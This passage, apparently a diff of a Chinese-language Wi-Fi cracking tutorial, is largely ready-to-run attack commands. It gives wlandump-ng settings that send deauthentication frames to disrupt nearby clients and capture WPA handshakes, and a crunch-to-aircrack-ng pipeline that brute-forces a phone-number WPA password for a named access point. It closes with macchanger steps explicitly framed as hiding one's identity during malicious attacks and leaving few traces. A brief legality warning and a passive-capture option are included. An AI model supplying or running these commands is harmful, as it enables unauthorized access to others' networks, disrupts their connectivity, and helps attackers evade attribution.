+- `-c 1`:从通道1开始的2.4Ghz范围(将转到13) +- `-t 60':每个通道停留60s(实验值较低,默认值为5) +- `-d 100`:发送deauth每100个信标帧 +- `-D 10`:每隔10个信标帧发送解析数据包 +- “-m 512”:内部缓冲区大小,对于低资源机器使用512 +- `-b`:激活信号到最后10个探测请求 +- `-r`:如果循环在通道1上,则重置deauthentication / detachosciation计数器 +- `-s 20`:显示20条状态行 + +**警告:**在大多数地方使用这个是不合法的。更多信息请参考[这]((https://github.com/ZerBea/hcxtools#warning)。 + +`wlandump-ng`也提供了在被动模式下运行的选项,而不会发送任何解除认证/解除关联帧。 如果你对中断你周围的人的网络活动(你应该是)敏感,则建议你这样做。代价是你将获得的握手少得多,这种方法使得捕获不可见。 + +```bash +# 在被动模式下使用默认设置运行 +wlandump-ng -i wlan0 -o capture.cap -p -s 20 +``` + +## 使用`crunch`生成单词列表 + +`crunch`是使用给定字符串或模式的组合生成单词列表的工具。 我们可以使用crunch来即时生成密码列表,并将其管理为`aircrack-ng`,而不会将单词列表保存到磁盘。 + + +```bash +# 安装crunch +sudo apt-get install crunch +``` + +要想知道如何运行crunch,可以从命令行运行(一旦开始发送密码,就可以按`ctrl-c`): + +```bash +# 语法8 8是生成密码的最小长度和最大长度 +# 01234567890是组合/排列构成密码的一组字符 +crunch 8 8 0123456789 +``` + +``` +Crunch现在将生成以下数据量:900000000字节 +858 MB +0 GB +0 TB +0 PB +Crunch现在将生成以下行数:100000000 +00000000 +00000001 +00000002 +00000003 +00000004 +00000005 +00000006 +00000007 +00000008 +00000009 +... +99999999 +``` + +我们可以将`crunch`的输出作为输入输出到`aircrack-ng`,使用它生成的密码作为我们的单词列表。 这里我们使用`crunch`特殊规则字符`%`来表示数字。 此命令尝试破解10位电话号码的WPA密码(使用crunch即时生成的102GB的号码): + +```bash +# 我们也可以使用-t "@^%,"  使用模式'@' 替换小写 ',' -替换大写 +# '%' -替换数字以及'^' -替换特殊字符 +# *************** 不要忘记最后的'-' +crunch 10 10 -t "%%%%%%%%%%" | aircrack-ng -a2 capture.cap -b 58:98:35:CB:A2:77 -w - +``` + +感谢[@hiteshnayak305](https://github.com/hiteshnayak305)介绍`crunch`并将此次更新作为[PR](https://github.com/brannondorsey/wifi-cracking/pull/17)。 + +## 利用`macchanger`魄户你的身份 + +每当您使用Wi-Fi进行任何远程恶意攻击时,最好是伪造你的Wi-Fi设备的MAC地址,以便记录的任何网络流量都不能与设备制造商分配的串行连接。 + +这是利用`macchanger`的一个小尝试: + +```bash +# 下载MAC changer +sudo apt-get install macchanger + +# 关闭设备 +sudo ifconfig wlan0 down + +# 改变mac +# -A 为有效的供应商分配一个随机的MAC w/a +# -r 让它真正随机 +# -p 将其恢复到原始的硬件MAC +sudo macchanger -A wlan0 + +# 启动设备 +sudo ifconfig wlan0 up +``` + +如果你有多张无线网卡,那么改变所有无线网卡的MAC是个好主意。 或者更好的是,当你尝试捕获握手时,将未使用的无线接口关闭,尽可能少地留下痕迹。 请注意,欺骗更改在重新启动时不会持续。